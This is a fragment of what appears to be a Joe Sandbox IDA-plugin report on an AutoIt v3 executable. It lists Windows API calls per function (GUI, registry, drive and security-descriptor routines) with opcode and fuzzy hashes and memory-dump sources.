• ImageList_Destroy.COMCTL32(00000000,?), ref: 00126FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00126FB7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0
• API String ID: 2760611726-4108050209
• Opcode ID: f3ef42ae16102d5f720a49bc63d5764eead958344b6f2e6eca71f0d67b59eff7
• Instruction ID: 6dbd65f36256a0c1318c938341a9f53839bc8a3b1f69ad6d4369c0cb81809b5d
• Opcode Fuzzy Hash: f3ef42ae16102d5f720a49bc63d5764eead958344b6f2e6eca71f0d67b59eff7
• Instruction Fuzzy Hash: D112CE34201261EFDB25DF24EC58BBAB7E1FB45300F148469F4899B6A1CB71ECA1DB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000), ref: 0015273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0015286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001528A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001528B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00152900
• GetClientRect.USER32(00000000,?), ref: 0015290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00152955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00152964
• GetStockObject.GDI32(00000011), ref: 00152974
• SelectObject.GDI32(00000000,00000000), ref: 00152978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00152988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00152991
• DeleteDC.GDI32(00000000), ref: 0015299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001529C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 001529DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00152A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00152A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00152A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00152A77
• GetStockObject.GDI32(00000011), ref: 00152A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00152A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00152A97
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: d7a8cf10a0828a43acfa00cd784e81565d5b957c8c51a5020df2a1226d567cd7
• Instruction ID: e3c09de3ac1cc9e5dd182767027bd5565c4f581f3d0da65c2ad85e08a4519116
• Opcode Fuzzy Hash: d7a8cf10a0828a43acfa00cd784e81565d5b957c8c51a5020df2a1226d567cd7
• Instruction Fuzzy Hash: 31B15A72A00215BFEB14DFA8DC49FAE7BA9FB09711F008115F915EB691D7B4AD40CBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001), ref: 00144AED
• GetDriveTypeW.KERNEL32(?,0016CB68,?,\\.\,0016CC08), ref: 00144BCA
• SetErrorMode.KERNEL32(00000000,0016CB68,?,\\.\,0016CC08), ref: 00144D36
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: b1c47a644c41512d672924dc7319884e3136dadf7f9cf3f0e9b5675c8a1bc09e
• Instruction ID: 0dd9ed0207c82b2c2ac7402c1b7c44f16617f9095ac082a0c75b23b5d92127b9
• Opcode Fuzzy Hash: b1c47a644c41512d672924dc7319884e3136dadf7f9cf3f0e9b5675c8a1bc09e
• Instruction Fuzzy Hash: F261C330705205DBCF08DF64CAD2EBC77A0EB05345B294016F846AB6B2DB35ED41DBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSysColor.USER32(00000012), ref: 00167421
• SetTextColor.GDI32(?,?), ref: 00167425
• GetSysColorBrush.USER32(0000000F), ref: 0016743B
• GetSysColor.USER32(0000000F), ref: 00167446
• CreateSolidBrush.GDI32(?), ref: 0016744B
• GetSysColor.USER32(00000011), ref: 00167463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00167471
• SelectObject.GDI32(?,00000000), ref: 00167482
• SetBkColor.GDI32(?,00000000), ref: 0016748B
• SelectObject.GDI32(?,?), ref: 00167498
• InflateRect.USER32(?,000000FF,000000FF), ref: 001674B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001674CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 001674DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0016752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00167554
• InflateRect.USER32(?,000000FD,000000FD), ref: 00167572
• DrawFocusRect.USER32(?,?), ref: 0016757D
• GetSysColor.USER32(00000011), ref: 0016758E
• SetTextColor.GDI32(?,00000000), ref: 00167596
• DrawTextW.USER32(?,001670F5,000000FF,?,00000000), ref: 001675A8
• SelectObject.GDI32(?,?), ref: 001675BF
• DeleteObject.GDI32(?), ref: 001675CA
• SelectObject.GDI32(?,?), ref: 001675D0
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 001675D5
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 001675DB
                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 001675E5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1996641542-0
                                                                                                                                                                                                                                          • Opcode ID: 933bc32e6b23abbb4dba5a254e56a30dae005db223dcbe0a6231537e5337187d
                                                                                                                                                                                                                                          • Instruction ID: 66022edf119eab5d2e0cee444f6b853a1fe7077ffdf0bc2b4392f661b87c5675
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 933bc32e6b23abbb4dba5a254e56a30dae005db223dcbe0a6231537e5337187d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C615D72900218AFDF019FA4DC49AEE7FB9EB09321F118125F915AB6E1D7B49990CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32(?), ref: 00161128
• GetDesktopWindow.USER32 ref: 0016113D
• GetWindowRect.USER32(00000000), ref: 00161144
• GetWindowLongW.USER32(?,000000F0), ref: 00161199
• DestroyWindow.USER32(?), ref: 001611B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001611ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0016120B
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0016121D
• SendMessageW.USER32(00000000,00000421,?,?), ref: 00161232
• SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00161245
• IsWindowVisible.USER32(00000000), ref: 001612A1
• SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001612BC
• SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001612D0
• GetWindowRect.USER32(00000000,?), ref: 001612E8
• MonitorFromPoint.USER32(?,?,00000002), ref: 0016130E
• GetMonitorInfoW.USER32(00000000,?), ref: 00161328
• CopyRect.USER32(?,?), ref: 0016133F
• SendMessageW.USER32(00000000,00000412,00000000), ref: 001613AA
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 6838fe05171ece30587cabe934d7deb8c37340bc19173c4c01e396fb75be1753
• Instruction ID: 0f258ae55a73aeed86bc6a7ec5199ff403b8680faa0a90da61e0b79f2499206a
• Opcode Fuzzy Hash: 6838fe05171ece30587cabe934d7deb8c37340bc19173c4c01e396fb75be1753
• Instruction Fuzzy Hash: 98B19E71604341AFDB04DF64CC84BAABBE4FF84350F04891DF99A9B262C771E854CBA2
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CharUpperBuffW.USER32(?,?), ref: 001602E5
• _wcslen.LIBCMT ref: 0016031F
• _wcslen.LIBCMT ref: 00160389
• _wcslen.LIBCMT ref: 001603F1
• _wcslen.LIBCMT ref: 00160475
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001604C5
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00160504
  • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
  • Part of subcall function 0013223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00132258
  • Part of subcall function 0013223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0013228A
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: dbf4ae9f3359b9021c3687aa253ec239401551dfbd5b9a11e40cc96f54a854ca
• Instruction ID: a85cdfb80863fd3a722c627e93c488a415972300943a6c90b26a76211ba3cc81
• Opcode Fuzzy Hash: dbf4ae9f3359b9021c3687aa253ec239401551dfbd5b9a11e40cc96f54a854ca
• Instruction Fuzzy Hash: DCE1BD312183018FCB29DF24C95097BB3E6BF98314B15496DF896AB3A2DB30ED55CB91
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E8968
• GetSystemMetrics.USER32(00000007), ref: 000E8970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000E899B
• GetSystemMetrics.USER32(00000008), ref: 000E89A3
• GetSystemMetrics.USER32(00000004), ref: 000E89C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000E89E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000E89F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000E8A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000E8A3C
• GetClientRect.USER32(00000000,000000FF), ref: 000E8A5A
• GetStockObject.GDI32(00000011), ref: 000E8A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 000E8A81
  • Part of subcall function 000E912D: GetCursorPos.USER32(?), ref: 000E9141
  • Part of subcall function 000E912D: ScreenToClient.USER32(00000000,?), ref: 000E915E
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000001), ref: 000E9183
                                                                                                                                                                                                                                            • Part of subcall function 000E912D: GetAsyncKeyState.USER32(00000002), ref: 000E919D
                                                                                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,000E90FC), ref: 000E8AA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                          • Opcode ID: 53dde5f660f6ea5ceaf698d50d97c8af97ced4cb507ed66e4ef9df8364c04e3a
                                                                                                                                                                                                                                          • Instruction ID: f88dcca4f849842161d64642ac593611bfb2dd3313fae52701ff3dabcc44bee4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53dde5f660f6ea5ceaf698d50d97c8af97ced4cb507ed66e4ef9df8364c04e3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEB18D35A0024AAFDB14DFA8DD45BAE7BB5FB48314F108229FA15A72D0DB74E890CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
  • Part of subcall function 001310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
  • Part of subcall function 001310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
  • Part of subcall function 001310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
  • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00130DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00130E29
• GetLengthSid.ADVAPI32(?), ref: 00130E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00130E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00130E96
• GetLengthSid.ADVAPI32(?), ref: 00130EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00130EB5
• HeapAlloc.KERNEL32(00000000), ref: 00130EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00130EDD
• CopySid.ADVAPI32(00000000), ref: 00130EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00130F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00130F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00130F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F6E
• HeapFree.KERNEL32(00000000), ref: 00130F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F7E
• HeapFree.KERNEL32(00000000), ref: 00130F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F8E
• HeapFree.KERNEL32(00000000), ref: 00130F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00130FA1
• HeapFree.KERNEL32(00000000), ref: 00130FA8
  • Part of subcall function 00131193: GetProcessHeap.KERNEL32(00000008,00130BB1,?,00000000,?,00130BB1,?), ref: 001311A1
  • Part of subcall function 00131193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00130BB1,?), ref: 001311A8
  • Part of subcall function 00131193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00130BB1,?), ref: 001311B7
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 7b0b63987c1abc5f4f71f23453dfa9e3750ec7cec7c783122cd62217ff69378d
• Instruction ID: f21c798e9f7c98bc6ae504f08a9d917596e8623cea0418f3afd89086630ba414
• Opcode Fuzzy Hash: 7b0b63987c1abc5f4f71f23453dfa9e3750ec7cec7c783122cd62217ff69378d
• Instruction Fuzzy Hash: 43714B7290020AEBDF219FA4DC44BBEBBBCBF09710F144125F959A6191D7719A45CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015C4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0016CC08,00000000,?,00000000,?,?), ref: 0015C544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0015C5A4
• _wcslen.LIBCMT ref: 0015C5F4
• _wcslen.LIBCMT ref: 0015C66F
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0015C6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0015C7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0015C84D
• RegCloseKey.ADVAPI32(?), ref: 0015C881
• RegCloseKey.ADVAPI32(00000000), ref: 0015C88E
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0015C960
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 76cf692b48251fec2f5d8f31a8c84812b9f5ae736e571ae106999de513c4552e
• Instruction ID: a41bb377b84efd053c6318057675feb0ce50b70f597168a6247e509e8a52845b
• Opcode Fuzzy Hash: 76cf692b48251fec2f5d8f31a8c84812b9f5ae736e571ae106999de513c4552e
• Instruction Fuzzy Hash: 14127435204701DFCB14DF24C881A6AB7E5EF88715F04889DF89A9B3A2DB71ED45CB92
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001609C6
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160A01
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00160A54
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160A8A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160B06
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160B81
                                                                                                                                                                                                                                            • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
                                                                                                                                                                                                                                            • Part of subcall function 00132BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00132BFA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                          • Opcode ID: d580fcaaa226c08fc42ef6ee18fe04c91319bfc255740189c45fa394baa823d4
                                                                                                                                                                                                                                          • Instruction ID: 0bd32a8a5dd85ff58524b3b9598a5677115893594a1076127dc6a74acf3ae7cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d580fcaaa226c08fc42ef6ee18fe04c91319bfc255740189c45fa394baa823d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE1DB352083018FCB15DF64C85096BB7E2BF98314F11895DF89AAB3A2D731ED55CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                          • Opcode ID: 08a195922e33c9e9648af332ff47da3e90442206217a90afaadea4e37dfa3fcb
                                                                                                                                                                                                                                          • Instruction ID: dcb98f4c9ec5fbdbdd058456ae7b96e00e5bc9bd82afde7dfa246d064c0b997b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08a195922e33c9e9648af332ff47da3e90442206217a90afaadea4e37dfa3fcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C71B03261426ACFCF20DE68C9515FA3791AFA1795B150528EC76AF285F771CD48C3E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0016835A
